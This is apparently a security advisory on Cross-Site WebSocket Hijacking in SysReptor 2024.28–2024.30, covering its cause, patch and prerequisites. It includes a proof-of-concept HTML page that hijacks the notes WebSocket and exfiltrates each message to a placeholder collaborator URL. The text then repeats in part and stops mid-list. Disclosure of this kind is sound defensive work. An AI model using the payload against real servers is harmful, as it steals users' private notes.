Impact
Cross-Site WebSocket Hijacking in SysReptor from version 2024.28 to version 2024.30 causes attackers to gain read and write access to personal notes and project notes when a logged-in SysReptor user visits a malicious same-site subdomain in the same browser session.
Patches
Update to SysReptor version 2024.40.
We additionally recommend configuring allowed hostnames/domain names via the ALLOWED_HOSTS setting.
Detailed Description
The root cause is the switch protocol sequence which is not protected by browsers' same-origin policy. The SysReptor server does not validate the Origin when establishing WebSocket connections. SysReptor uses session cookies for authentication, which browsers send cross-origin (but same-site due to SameSite=Strict).
However, the attack is limited to malicious same-site subdomains because SysReptor uses the cookie setting SameSite Strict. Hence, attackers must compromise a subdomain to host a malicious script (e.g., evil.example.com to attack sysreptor.example.com).
Attackers could gain read and write access to personal user notes (/ws/pentestusers/self/notes/) and project notes (/ws/pentestprojects/{target-project-uuid}/notes/). To access project notes, attackers need to obtain the project UUID.
Attack Chain
Prerequisites:
- Same-site subdomain
- Logged-in target user
- Project UUID (optional)
- Compromise a subdomain
- Host the malicious script on the subdomain:
<!DOCTYPE html>
<html lang="en">
<head>
<title>CSWSHJ Exploit</title>
<script>
var url = "wss://sysreptor.example.com/ws/pentestusers/self/notes/";
// var url = "wss://sysreptor.example.com/ws/pentestprojects/{target-project-uuid}/notes/";
var ws = new WebSocket(url);
ws.onmessage = function (event) {
fetch("{burp-collaborator-url}", {
method: "POST",
mode: "no-cors",
body: event.data,
});
};
</script>
</head>
<body>
<h1>CSWSHJ</h1>
<h3>Triggered exploit...</h3>
</body>
</html>
- Trick logged-in users into visiting the malicious subdomain to trigger the WebSocket hijacking attack and exfiltrate data from the WebSocket.
cmahrl Finder
Impact
Cross-Site WebSocket Hijacking in SysReptor from version 2024.28 to version 2024.30 causes attackers to gain read and write access to personal notes and project notes when a logged-in SysReptor user visits a malicious same-site subdomain in the same browser session.
Patches
Update to SysReptor version 2024.40.
We additionally recommend configuring allowed hostnames/domain names via the
ALLOWED_HOSTSsetting.Detailed Description
The root cause is the switch protocol sequence which is not protected by browsers' same-origin policy. The SysReptor server does not validate the
Originwhen establishing WebSocket connections. SysReptor uses session cookies for authentication, which browsers send cross-origin (but same-site due to SameSite=Strict).However, the attack is limited to malicious same-site subdomains because SysReptor uses the cookie setting SameSite Strict. Hence, attackers must compromise a subdomain to host a malicious script (e.g., evil.example.com to attack sysreptor.example.com).
Attackers could gain read and write access to personal user notes (
/ws/pentestusers/self/notes/) and project notes (/ws/pentestprojects/{target-project-uuid}/notes/). To access project notes, attackers need to obtain the project UUID.Attack Chain
Prerequisites: